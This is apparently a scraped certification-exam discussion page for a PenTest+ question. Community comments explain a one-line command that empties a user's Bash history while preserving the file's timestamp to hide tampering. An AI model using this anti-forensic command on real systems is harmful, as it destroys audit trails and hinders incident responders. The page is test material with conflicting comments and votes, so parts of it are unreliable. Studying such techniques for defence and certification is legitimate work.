A penetration tester gains access to a system and establishes persistence, and then run the following commands: Which of the following actions is the tester MOST likely performing?
A.
Redirecting Bash history to /dev/null
B.
Making a copy of the user's Bash history to further enumeration
C.
Covering tracks by clearing the Bash history
D.
Making decoy files on the system to confuse incident responders
The Linux command "cat /dev/null > temp; touch -r .bash_history temp; mv temp .bash_history" is a combination of three commands that are executed sequentially:
"cat /dev/null > temp" - This command is used to clear the contents of a file called "temp". The contents of the special file "/dev/null" are redirected to "temp", which overwrites any existing data in the file and making the file empty.
"touch -r .bash_history temp" - This command updates the timestamp of the file "temp" to match the timestamp of another file called ".bash_history". The "-r" option specifies that the timestamp of the file ".bash_history" is used to update the timestamp of the file "temp".
"mv temp .bash_history" - This command renames or moves the file "temp" to ".bash_history". The file "temp" is no longer exist and a new file called ".bash_history" is created. If a file with the same name already exists, it will be overwritten by the file "temp".
Overall, this command sequence creates an empty file called ".bash_history" with the same timestamp as an existing file with the same name and removes the original file "temp"
C. Covering tracks by clearing the Bash history
The tester is most likely performing an action of covering tracks by clearing the Bash history. The tester is redirecting the Bash history to /dev/null by using the command "cat /dev/null > temp" which will clear the content of the Bash history file. The tester is then using the command "touch -r .bash_history temp" to reset the timestamp of the temp file to match the timestamp of the Bash history file. Finally, the tester is moving the temp file to replace the Bash history file using "mv temp .bash_history" command. This will clear the Bash history file and make it difficult for incident responders to track the tester's actions on the system.
Answer: C. Covering tracks by clearing the Bash history
Reason: The penetration tester is clearing the Bash history and preserving its timestamp, a common technique to cover tracks and avoid detection after executing commands.
cat /dev/null > temp: This empties the temp file, essentially creating an empty file.
touch -r .bash_history temp: This sets the timestamp of temp to match the .bash_history file.
mv temp .bash_history: This replaces the .bash_history file with the empty temp file, effectively clearing its contents while preserving the original timestamp.
The commands effectively clear the Bash history, while preserving the original timestamp, making it less obvious that the history has been tampered with.
The cat /dev/null command outputs nothing (since /dev/null is a special file that discards all data written to it) and the > operator redirects the output of cat /dev/null to a new file called temp.
This creates a new, empty file called temp in the current working directory, and any existing contents in temp (if there were any) are overwritten with the empty output of cat /dev/null. The purpose of creating an empty file like this is to replace the contents of the .bash_history file with an empty file, effectively erasing the command history.
After creating the new temp file, the touch -r .bash_history temp command sets the modification time of the temp file to match that of the original .bash_history file, so that it appears as if the .bash_history file was never modified.
Finally, the mv temp .bash_history command renames the temp file to .bash_history, effectively replacing the original .bash_history file with an empty file that has the same name and modification time.
cat /dev/null > temp:
This command creates an empty file named "temp" by redirecting the null device ("/dev/null") to the file. Essentially, it empties the contents of "temp" or creates an empty file if it doesn't exist.
touch -r .bash_history temp:
The "touch" command is used to update the timestamps of files. In this case, it updates the timestamp of "temp" to match the timestamp of ".bash_history". By using the "-r" option, the timestamp of ".bash_history" is copied to "temp". This command essentially sets the same modification time for "temp" as that of ".bash_history".
mv temp .bash_history:
The "mv" command is used to rename or move files. In this case, it renames "temp" to ".bash_history". As a result, the empty file created in the first command is now moved or renamed to replace the original ".bash_history" file. The end result is that ".bash_history" is emptied and replaced with an empty file.
The touch -r command is used to use the timestamp of another file. There is no deleting taking place. MV temp is to move to the temp. The tester is making a copy of the file.
https://www.geeksforgeeks.org/touch-command-in-linux-with-examples/
upvoted 2 times
...
This section is not available anymore. Please use the main Exam Page.PT0-002 Exam Questions
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
RRabbit_111
Highly Voted 7 months, 2 weeks agoRRabbit_111
Highly Voted 7 months, 2 weeks agoSweety_Certified7
Most Recent 7 months agocy_analyst
7 months, 2 weeks agoMeisAdriano
9 months, 1 week agosurfuganda
1 year, 1 month agoP0wned
1 year, 11 months agomypixmania
2 years, 5 months agoManzer
2 years, 6 months ago